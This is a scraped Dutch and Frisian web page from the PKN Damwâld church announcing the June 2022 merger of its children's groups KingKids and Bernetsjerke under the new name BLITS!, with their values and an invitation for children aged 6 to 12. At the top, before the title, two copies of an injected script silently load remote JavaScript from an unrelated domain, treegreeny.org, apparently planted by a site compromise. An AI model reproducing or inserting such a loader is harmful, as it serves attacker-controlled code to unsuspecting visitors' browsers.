;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); KingKids en Bernetsjerke samen verder .... BLITS! - PKN Damwâld

KingKids en Bernetsjerke samen verder …. BLITS!

Gepubliceerd op: maandag 20 juni 2022

Ineens vlogen de confettisnippers door de lucht, was het aftellen gedaan … het feest is compleet! …  BLITS ! BLITS ? …. ja …. BLITS !

Bidde:    Tegearre mei en foar de bern prate mei God

Leauwen:  Fertroud meitsje mei it leauwen fanút de Bibel yn de leafde fan God

Iepen:  Iepen wêze nei de bern oer it leauwen, yn it fertrouwen dat de bern ek iepen binnen nei in oar

Trochjaan: De bern leare om de leafde fan God troch te jaan oan in oar

Sjonge: Troch de ferkes te lústerje en te sjongen, God earje en priizje

Afgelopen zondagmorgen,  tijdens de overstapdienst – wat bijzonder toepasselijk ! -, gingen de Bernetsjerke en de KingKids op feestelijke wijze samen op in BLITS! Al lange tijd gonsde het van de geruchten over de nieuwe naamgeving en liepen de kinderen en leidinggevenden met een heimelijke blik rond, maar met deze BLITS(e) betekenisvolle naam en dito logo werd een altijd al geweldige samenwerking bekroond met een feestelijke samensmelting !

Kindernevendienst is elke zondag weer een bijzondere tijd. Een tijd waaraan je later ook vast met een fijn gevoel aan terug zult denken. Samen in gesprek over het geloof, samen even uit de grote mensenwereld en het gezellig hebben met elkaar. Geloven – ook daar krijg je les in. Van je ouders. Op school. En niet te vergeten …. ook in de kerk. Iedere week wordt er tijdens een gedeelte van de kerkdienst in onze kerk voor alle kinderen in de basisschoolleeftijd een BLITS ! gehouden. In een eigen ruimte horen jullie verhalen uit de Bijbel en wordt er getekend, geknutseld of een spel gespeeld, dat aansluit bij deze verhalen.

Kindernevendienst … BLITS! Een vast moment tijdens de dienst speciaal voor jullie. Elke keer is het weer een verrassing wat we gaan doen. Ben je nog nooit geweest en ben je tussen 6 en 12 jaar? Kom dan zeker een keertje kijken. Je bent heel erg welkom.

Het aftelmoment in beeld … klik op de link!